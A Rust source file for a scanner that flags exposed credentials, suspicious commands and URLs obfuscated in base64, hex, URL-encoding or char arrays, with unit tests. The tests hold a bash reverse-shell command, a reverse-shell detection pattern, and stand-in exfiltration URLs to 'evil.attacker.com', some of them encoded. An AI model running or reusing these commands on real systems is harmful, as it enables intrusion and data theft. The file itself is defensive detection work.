1use std::collections::HashSet;
2
3use base64::{engine::general_purpose, Engine as _};
4use regex::Regex;
5
6use crate::confidence::{calculate_pattern_confidence, get_base_confidence};
7use crate::context::{
8 is_likely_comment, is_public_ioc, is_safe_context_for_suspicious_commands,
9 classify_file_context, BlockCommentTracker,
10};
11use crate::error::AnalyzerError;
12use crate::types::{AnalysisResult, Finding, Ioc};
13
14pub struct SecretAnalyzer {
20 secret_patterns: Vec<(String, Regex)>,
21 suspicious_patterns: Vec<(String, Regex)>,
22 long_string_regex: Regex,
23 base64_regex: Regex,
24 hex_regex: Regex,
25 url_encoded_regex: Regex,
26 char_array_regex: Regex,
27 url_regex: Regex,
28 js_keywords: Vec<String>,
29}
30
31impl SecretAnalyzer {
32 pub fn new(
40 rules: impl IntoIterator<Item = (String, String)>,
41 suspicious_rules: impl IntoIterator<Item = (String, String)>,
42 ) -> Result<Self, AnalyzerError> {
43 let mut secret_compiled = Vec::new();
44 for (id, pattern) in rules {
45 let re = Regex::new(&pattern).map_err(|e| AnalyzerError::InvalidPattern {
46 rule_id: id.clone(),
47 source: e,
48 })?;
49 secret_compiled.push((id, re));
50 }
51
52 let mut suspicious_compiled = Vec::new();
53 for (id, pattern) in suspicious_rules {
54 let re = Regex::new(&pattern).map_err(|e| AnalyzerError::InvalidPattern {
55 rule_id: id.clone(),
56 source: e,
57 })?;
58 suspicious_compiled.push((id, re));
59 }
60
61 Ok(SecretAnalyzer {
62 secret_patterns: secret_compiled,
63 suspicious_patterns: suspicious_compiled,
64 long_string_regex: Regex::new(r#"["']([a-zA-Z0-9+/=,.\-_]{50,})["']"#)
65 .map_err(|e| AnalyzerError::InvalidPattern {
66 rule_id: "long_string_builtin".into(),
67 source: e,
68 })?,
69 base64_regex: Regex::new(r"\b([A-Za-z0-9+/=_-]{20,})\b").map_err(|e| {
70 AnalyzerError::InvalidPattern {
71 rule_id: "base64_builtin".into(),
72 source: e,
73 }
74 })?,
75 hex_regex: Regex::new(r#"(?i)(?:0x)?["']([0-9a-f]{16,})["']|\\x([0-9a-f]{2}(?:\\x[0-9a-f]{2}){7,})"#)
76 .map_err(|e| AnalyzerError::InvalidPattern {
77 rule_id: "hex_builtin".into(),
78 source: e,
79 })?,
80 url_encoded_regex: Regex::new(r"(?i)(?:postgres|mysql|mongodb|redis|amqp|mssql)%3[aA]%2[fF]%2[fF][^\s\x22\x27]{10,}")
81 .map_err(|e| AnalyzerError::InvalidPattern {
82 rule_id: "url_encoded_builtin".into(),
83 source: e,
84 })?,
85 char_array_regex: Regex::new(r"\[(\s*\d{2,3}\s*(?:,\s*\d{2,3}\s*){7,})\]")
86 .map_err(|e| AnalyzerError::InvalidPattern {
87 rule_id: "char_array_builtin".into(),
88 source: e,
89 })?,
90 url_regex: Regex::new(r"https?://[a-zA-Z0-9.\-_]+(?:/[^\s<>\x22\x27]*)?").map_err(
91 |e| AnalyzerError::InvalidPattern {
92 rule_id: "url_builtin".into(),
93 source: e,
94 },
95 )?,
96 js_keywords: vec![
97 "eval".to_string(),
98 "document.write".to_string(),
99 "innerHTML".to_string(),
100 "unescape".to_string(),
101 "crypto.subtle".to_string(),
102 ],
103 })
104 }
105
106 pub fn analyze_content(
114 &self,
115 content: &str,
116 file_path: &str,
117 file_name: &str,
118 ) -> AnalysisResult {
119 let mut result = AnalysisResult::new();
120 let mut existing_findings: HashSet<(String, String)> = HashSet::new();
121 let mut existing_iocs: HashSet<String> = HashSet::new();
122
123 let extension = file_name.split('.').last().unwrap_or("").to_lowercase();
124 let is_js_ts = extension == "js" || extension == "ts";
125 let is_safe_context = is_safe_context_for_suspicious_commands(file_path, &extension);
126 let file_context = classify_file_context(file_path);
127 let context_multiplier = file_context.multiplier();
128 let mut block_tracker = BlockCommentTracker::new(&extension);
129
130 for line in content.lines() {
131 let in_block_comment = block_tracker.update(line);
132
133 if is_likely_comment(line, &extension) && !in_block_comment {
134 continue;
135 }
136
137 let comment_multiplier = if in_block_comment { 0.1 } else { 1.0 };
138
139 if is_js_ts {
140 self.check_js_keywords(
141 line,
142 file_path,
143 file_context,
144 context_multiplier,
145 comment_multiplier,
146 &mut existing_findings,
147 &mut result,
148 );
149 }
150
151 self.check_secret_patterns(
152 line,
153 file_path,
154 file_context,
155 context_multiplier,
156 comment_multiplier,
157 &mut existing_findings,
158 &mut result,
159 );
160
161 if !is_safe_context {
162 self.check_suspicious_patterns(
163 line,
164 file_path,
165 file_context,
166 context_multiplier,
167 comment_multiplier,
168 &mut result,
169 );
170 }
171 }
172
173 self.check_high_entropy_strings(
174 content,
175 file_path,
176 &extension,
177 file_context,
178 context_multiplier,
179 &mut existing_findings,
180 &mut result,
181 );
182
183 self.check_base64_iocs(
184 content,
185 file_path,
186 file_context,
187 context_multiplier,
188 &mut existing_iocs,
189 &mut result,
190 );
191
192 self.check_hex_secrets(content, file_path, file_context, context_multiplier, &mut result);
193 self.check_url_encoded_secrets(content, file_path, file_context, context_multiplier, &mut result);
194 self.check_char_array_secrets(content, file_path, file_context, context_multiplier, &mut result);
195
196 self.extract_urls(content, file_path, &mut existing_iocs, &mut result);
197
198 result
199 }
200
201 fn check_js_keywords(
202 &self,
203 line: &str,
204 file_path: &str,
205 file_context: crate::types::FileContext,
206 context_multiplier: f64,
207 comment_multiplier: f64,
208 existing: &mut HashSet<(String, String)>,
209 result: &mut AnalysisResult,
210 ) {
211 for keyword in &self.js_keywords {
212 if line.contains(keyword.as_str()) {
213 let desc = format!("Suspicious JS keyword '{}'", keyword);
214 let key = (desc.clone(), "Suspicious JS Keyword".to_string());
215 if existing.insert(key) {
216 let base_conf = get_base_confidence("Suspicious JS Keyword");
217 let conf = (base_conf * context_multiplier * comment_multiplier).clamp(0.0, 1.0);
218 result.findings.push(Finding {
219 description: desc,
220 finding_type: "Suspicious JS Keyword".to_string(),
221 file: file_path.to_string(),
222 match_content: line.trim().to_string(),
223 confidence: conf,
224 file_context,
225 });
226 }
227 }
228 }
229 }
230
231 fn check_secret_patterns(
232 &self,
233 line: &str,
234 file_path: &str,
235 file_context: crate::types::FileContext,
236 context_multiplier: f64,
237 comment_multiplier: f64,
238 existing: &mut HashSet<(String, String)>,
239 result: &mut AnalysisResult,
240 ) {
241 for (id, re) in &self.secret_patterns {
242 for caps in re.captures_iter(line) {
243 if let Some(m) = caps.get(0) {
244 let matched_str = m.as_str();
245 let match_start = m.start();
246 let raw_conf =
247 calculate_pattern_confidence(id, matched_str, line, match_start);
248 let conf = (raw_conf * context_multiplier * comment_multiplier).clamp(0.0, 1.0);
249
250 if id == "Generic API Key" {
251 result.findings.push(Finding {
252 description: "Possible API key.".to_string(),
253 finding_type: id.clone(),
254 file: file_path.to_string(),
255 match_content: matched_str.to_string(),
256 confidence: conf,
257 file_context,
258 });
259 } else {
260 let desc = format!("Possible exposed secret '{}'", id);
261 let key = (desc.clone(), id.clone());
262 if existing.insert(key) {
263 result.findings.push(Finding {
264 description: desc,
265 finding_type: id.clone(),
266 file: file_path.to_string(),
267 match_content: matched_str.to_string(),
268 confidence: conf,
269 file_context,
270 });
271 }
272 }
273 }
274 }
275 }
276 }
277
278 fn check_suspicious_patterns(
279 &self,
280 line: &str,
281 file_path: &str,
282 file_context: crate::types::FileContext,
283 context_multiplier: f64,
284 comment_multiplier: f64,
285 result: &mut AnalysisResult,
286 ) {
287 for (id, re) in &self.suspicious_patterns {
288 if re.is_match(line) {
289 let line_trim = line.trim();
290 if line_trim.starts_with("import ")
291 || line_trim.starts_with("from ")
292 || line_trim.contains("console.log")
293 {
294 continue;
295 }
296 for caps in re.captures_iter(line) {
297 if let Some(m) = caps.get(0) {
298 let raw_conf =
299 calculate_pattern_confidence(id, m.as_str(), line, m.start());
300 let conf =
301 (raw_conf * context_multiplier * comment_multiplier).clamp(0.0, 1.0);
302 result.findings.push(Finding {
303 description: format!("Comando suspeito: '{}'", id),
304 finding_type: id.clone(),
305 file: file_path.to_string(),
306 match_content: m.as_str().to_string(),
307 confidence: conf,
308 file_context,
309 });
310 }
311 }
312 }
313 }
314 }
315
316 fn check_high_entropy_strings(
317 &self,
318 content: &str,
319 file_path: &str,
320 extension: &str,
321 file_context: crate::types::FileContext,
322 context_multiplier: f64,
323 existing: &mut HashSet<(String, String)>,
324 result: &mut AnalysisResult,
325 ) {
326 if matches!(
327 extension,
328 "js" | "ts" | "py" | "env" | "json" | "xml" | "yaml"
329 ) {
330 for caps in self.long_string_regex.captures_iter(content) {
331 if let Some(matched) = caps.get(1) {
332 let s = matched.as_str();
333 let entropy = crate::confidence::calculate_entropy(s);
334 if entropy > 5.2 {
335 let desc = format!("High entropy string ({:.2})", entropy);
336 let key = (desc.clone(), "High Entropy String".to_string());
337 if existing.insert(key) {
338 let raw_conf = (entropy - 5.2) / 2.0 + 0.3;
339 let conf = (raw_conf.min(0.85) * context_multiplier).clamp(0.0, 1.0);
340 result.findings.push(Finding {
341 description: desc,
342 finding_type: "High Entropy String".to_string(),
343 file: file_path.to_string(),
344 match_content: s.to_string(),
345 confidence: conf,
346 file_context,
347 });
348 }
349 }
350 }
351 }
352 }
353 }
354
355 fn check_base64_iocs(
356 &self,
357 content: &str,
358 file_path: &str,
359 file_context: crate::types::FileContext,
360 context_multiplier: f64,
361 existing_iocs: &mut HashSet<String>,
362 result: &mut AnalysisResult,
363 ) {
364 for caps in self.base64_regex.captures_iter(content) {
365 if let Some(m) = caps.get(1) {
366 let s = m.as_str();
367 let decoded = general_purpose::STANDARD
368 .decode(s)
369 .or_else(|_| general_purpose::STANDARD_NO_PAD.decode(s));
370 if let Ok(bytes) = decoded {
371 if let Ok(decoded_str) = String::from_utf8(bytes) {
372 for url_match in self.url_regex.find_iter(&decoded_str) {
373 let url = url_match.as_str();
374 if is_public_ioc(url) && existing_iocs.insert(url.to_string()) {
375 let desc = format!(
376 "Obfuscated URL in Base64: {}...",
377 &url[..std::cmp::min(50, url.len())]
378 );
379 let conf = (0.70 * context_multiplier).clamp(0.0, 1.0);
380 result.findings.push(Finding {
381 description: desc,
382 finding_type: "Hidden IOC (Base64)".to_string(),
383 file: file_path.to_string(),
384 match_content: url.to_string(),
385 confidence: conf,
386 file_context,
387 });
388 result.iocs.push(Ioc {
389 ioc: url.to_string(),
390 source_file: file_path.to_string(),
391 });
392 }
393 }
394 }
395 }
396 }
397 }
398 }
399
400 fn check_hex_secrets(
401 &self,
402 content: &str,
403 file_path: &str,
404 file_context: crate::types::FileContext,
405 context_multiplier: f64,
406 result: &mut AnalysisResult,
407 ) {
408 for caps in self.hex_regex.captures_iter(content) {
409 let hex_str = caps.get(1).or_else(|| caps.get(2));
410 if let Some(m) = hex_str {
411 let raw = m.as_str().replace("\\x", "");
412 let bytes: Result<Vec<u8>, _> = (0..raw.len())
413 .step_by(2)
414 .map(|i| u8::from_str_radix(&raw[i..i.saturating_add(2).min(raw.len())], 16))
415 .collect();
416 if let Ok(bytes) = bytes {
417 if let Ok(decoded) = String::from_utf8(bytes) {
418 for url_match in self.url_regex.find_iter(&decoded) {
419 let url = url_match.as_str();
420 if is_public_ioc(url) {
421 let conf = (0.75 * context_multiplier).clamp(0.0, 1.0);
422 result.findings.push(Finding {
423 description: format!(
424 "Obfuscated URL in hex: {}...",
425 &url[..std::cmp::min(50, url.len())]
426 ),
427 finding_type: "Hidden IOC (Hex)".to_string(),
428 file: file_path.to_string(),
429 match_content: url.to_string(),
430 confidence: conf,
431 file_context,
432 });
433 result.iocs.push(Ioc {
434 ioc: url.to_string(),
435 source_file: file_path.to_string(),
436 });
437 }
438 }
439 for (id, re) in &self.secret_patterns {
440 if re.is_match(&decoded) {
441 let conf = (0.80 * context_multiplier).clamp(0.0, 1.0);
442 result.findings.push(Finding {
443 description: format!("Secret '{}' hidden in hex encoding", id),
444 finding_type: "Hidden IOC (Hex)".to_string(),
445 file: file_path.to_string(),
446 match_content: decoded.clone(),
447 confidence: conf,
448 file_context,
449 });
450 }
451 }
452 }
453 }
454 }
455 }
456 }
457
458 fn check_url_encoded_secrets(
459 &self,
460 content: &str,
461 file_path: &str,
462 file_context: crate::types::FileContext,
463 context_multiplier: f64,
464 result: &mut AnalysisResult,
465 ) {
466 for m in self.url_encoded_regex.find_iter(content) {
467 let encoded = m.as_str();
468 let mut decoded = String::with_capacity(encoded.len());
469 let mut chars = encoded.chars().peekable();
470 while let Some(c) = chars.next() {
471 if c == '%' {
472 let hex: String = chars.by_ref().take(2).collect();
473 if hex.len() == 2 {
474 if let Ok(byte) = u8::from_str_radix(&hex, 16) {
475 decoded.push(byte as char);
476 continue;
477 }
478 }
479 decoded.push('%');
480 decoded.push_str(&hex);
481 } else {
482 decoded.push(c);
483 }
484 }
485 let conf = (0.85 * context_multiplier).clamp(0.0, 1.0);
486 result.findings.push(Finding {
487 description: format!(
488 "URL-encoded connection string: {}...",
489 &decoded[..std::cmp::min(60, decoded.len())]
490 ),
491 finding_type: "Hidden IOC (URL Encoded)".to_string(),
492 file: file_path.to_string(),
493 match_content: decoded.clone(),
494 confidence: conf,
495 file_context,
496 });
497 for url_match in self.url_regex.find_iter(&decoded) {
498 let url = url_match.as_str();
499 if is_public_ioc(url) {
500 result.iocs.push(Ioc {
501 ioc: url.to_string(),
502 source_file: file_path.to_string(),
503 });
504 }
505 }
506 }
507 }
508
509 fn check_char_array_secrets(
510 &self,
511 content: &str,
512 file_path: &str,
513 file_context: crate::types::FileContext,
514 context_multiplier: f64,
515 result: &mut AnalysisResult,
516 ) {
517 for caps in self.char_array_regex.captures_iter(content) {
518 if let Some(m) = caps.get(1) {
519 let nums: Result<Vec<u8>, _> = m
520 .as_str()
521 .split(',')
522 .map(|s| s.trim().parse::<u32>())
523 .map(|r| r.map(|n| if n <= 127 { n as u8 } else { 0 }))
524 .collect();
525 if let Ok(bytes) = nums {
526 if bytes.iter().all(|&b| b >= 32 && b <= 126) {
527 let decoded = String::from_utf8_lossy(&bytes).to_string();
528 for url_match in self.url_regex.find_iter(&decoded) {
529 let url = url_match.as_str();
530 if is_public_ioc(url) {
531 let conf = (0.80 * context_multiplier).clamp(0.0, 1.0);
532 result.findings.push(Finding {
533 description: format!(
534 "Obfuscated URL in char array: {}...",
535 &url[..std::cmp::min(50, url.len())]
536 ),
537 finding_type: "Hidden IOC (Char Array)".to_string(),
538 file: file_path.to_string(),
539 match_content: url.to_string(),
540 confidence: conf,
541 file_context,
542 });
543 result.iocs.push(Ioc {
544 ioc: url.to_string(),
545 source_file: file_path.to_string(),
546 });
547 }
548 }
549 for (id, re) in &self.secret_patterns {
550 if re.is_match(&decoded) {
551 let conf = (0.85 * context_multiplier).clamp(0.0, 1.0);
552 result.findings.push(Finding {
553 description: format!("Secret '{}' hidden in char array", id),
554 finding_type: "Hidden IOC (Char Array)".to_string(),
555 file: file_path.to_string(),
556 match_content: decoded.clone(),
557 confidence: conf,
558 file_context,
559 });
560 }
561 }
562 }
563 }
564 }
565 }
566 }
567
568 fn extract_urls(
569 &self,
570 content: &str,
571 file_path: &str,
572 existing_iocs: &mut HashSet<String>,
573 result: &mut AnalysisResult,
574 ) {
575 for url_match in self.url_regex.find_iter(content) {
576 let url = url_match.as_str();
577 if is_public_ioc(url) && existing_iocs.insert(url.to_string()) {
578 result.iocs.push(Ioc {
579 ioc: url.to_string(),
580 source_file: file_path.to_string(),
581 });
582 }
583 }
584 }
585}
586
#[cfg(test)]
mod tests {
    use super::*;

    /// Builds an analyzer with a small fixed rule set shared by all tests.
    fn test_analyzer() -> SecretAnalyzer {
        let rules = vec![
            ("AWS Key".to_string(), r"AKIA[0-9A-Z]{16}".to_string()),
            (
                "GitHub Token".to_string(),
                r"ghp_[a-zA-Z0-9]{36}".to_string(),
            ),
            (
                "Generic API Key".to_string(),
                r"(?i)api[_\-]?key\s*[:=]\s*['\x22]?([a-zA-Z0-9_\x2d]{20,})['\x22]?".to_string(),
            ),
        ];
        let suspicious = vec![(
            "Reverse Shell".to_string(),
            r"(?i)bash\s+-i\s+>&\s+/dev/tcp".to_string(),
        )];
        SecretAnalyzer::new(rules, suspicious).expect("valid patterns")
    }

    #[test]
    fn test_detect_aws_key() {
        let analyzer = test_analyzer();
        let content = "aws_key = AKIAIOSFODNN7EXAMPLE1";
        let result = analyzer.analyze_content(content, "src/config.py", "config.py");
        assert!(!result.findings.is_empty());
        assert_eq!(result.findings[0].finding_type, "AWS Key");
    }

    #[test]
    fn test_detect_github_token() {
        let analyzer = test_analyzer();
        let content = "token = ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZ012345abcd";
        let result = analyzer.analyze_content(content, "src/auth.py", "auth.py");
        let github_findings: Vec<_> = result
            .findings
            .iter()
            .filter(|f| f.finding_type == "GitHub Token")
            .collect();
        assert!(!github_findings.is_empty());
    }

    #[test]
    fn test_test_file_lower_confidence() {
        let analyzer = test_analyzer();
        let content = "aws_key = AKIAIOSFODNN7EXAMPLE1";
        let prod = analyzer.analyze_content(content, "src/config.py", "config.py");
        let test = analyzer.analyze_content(content, "tests/test_config.py", "test_config.py");
        assert!(prod.findings[0].confidence > test.findings[0].confidence);
    }

    #[test]
    fn test_url_extraction() {
        let analyzer = test_analyzer();
        let content = "callback = 'http://evil.attacker.com/steal?data=1'";
        let result = analyzer.analyze_content(content, "src/app.py", "app.py");
        assert!(!result.iocs.is_empty());
        assert!(result.iocs[0].ioc.contains("evil.attacker.com"));
    }

    #[test]
    fn test_skip_localhost() {
        let analyzer = test_analyzer();
        let content = "url = 'http://localhost:8080/api'";
        let result = analyzer.analyze_content(content, "src/app.py", "app.py");
        assert!(result.iocs.is_empty());
    }

    #[test]
    fn test_suspicious_command() {
        let analyzer = test_analyzer();
        let content = "os.system('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1')";
        let result = analyzer.analyze_content(content, "src/exploit.py", "exploit.py");
        let suspicious: Vec<_> = result
            .findings
            .iter()
            .filter(|f| f.finding_type == "Reverse Shell")
            .collect();
        assert!(!suspicious.is_empty());
    }

    #[test]
    fn test_detect_hex_url() {
        let analyzer = test_analyzer();
        // Hex encoding of "http://evil.attacker.com/steal" (30 bytes, 60 digits).
        let hex_url = "687474703a2f2f6576696c2e61747461636b65722e636f6d2f737465616c";
        let content = format!("var payload = '{}';", hex_url);
        let result = analyzer.analyze_content(&content, "src/loader.js", "loader.js");
        let hex_findings: Vec<_> = result
            .findings
            .iter()
            .filter(|f| f.finding_type == "Hidden IOC (Hex)")
            .collect();
        assert!(
            !hex_findings.is_empty(),
            "should detect URL hidden in hex string"
        );
        assert!(
            hex_findings
                .iter()
                .any(|f| f.match_content.contains("evil.attacker.com")),
            "decoded URL should be reported as the match content"
        );
    }

    #[test]
    fn test_detect_url_encoded_connstr() {
        let analyzer = test_analyzer();
        let content = "dsn = postgres%3A%2F%2Fadmin%3Asecret%40evil.attacker.com%3A5432%2Fdb";
        let result = analyzer.analyze_content(content, "src/config.py", "config.py");
        let encoded_findings: Vec<_> = result
            .findings
            .iter()
            .filter(|f| f.finding_type == "Hidden IOC (URL Encoded)")
            .collect();
        assert!(!encoded_findings.is_empty(), "should detect URL-encoded connection string");
    }

    #[test]
    fn test_detect_char_array_url() {
        let analyzer = test_analyzer();
        let content = "var c = [104,116,116,112,58,47,47,101,118,105,108,46,97,116,116,97,99,107,101,114,46,99,111,109];";
        let result = analyzer.analyze_content(content, "src/obf.js", "obf.js");
        let char_findings: Vec<_> = result
            .findings
            .iter()
            .filter(|f| f.finding_type == "Hidden IOC (Char Array)")
            .collect();
        assert!(!char_findings.is_empty(), "should detect URL hidden in char array");
    }

    #[test]
    fn test_char_array_with_secret() {
        let analyzer = test_analyzer();
        let aws = "AKIAIOSFODNN7EXAMPLE1";
        let char_codes: String = aws
            .bytes()
            .map(|b| b.to_string())
            .collect::<Vec<_>>()
            .join(",");
        let content = format!("var k = [{}];", char_codes);
        let result = analyzer.analyze_content(&content, "src/steal.js", "steal.js");
        let findings: Vec<_> = result
            .findings
            .iter()
            .filter(|f| f.finding_type == "Hidden IOC (Char Array)")
            .collect();
        assert!(!findings.is_empty(), "should detect AWS key hidden in char array");
    }
}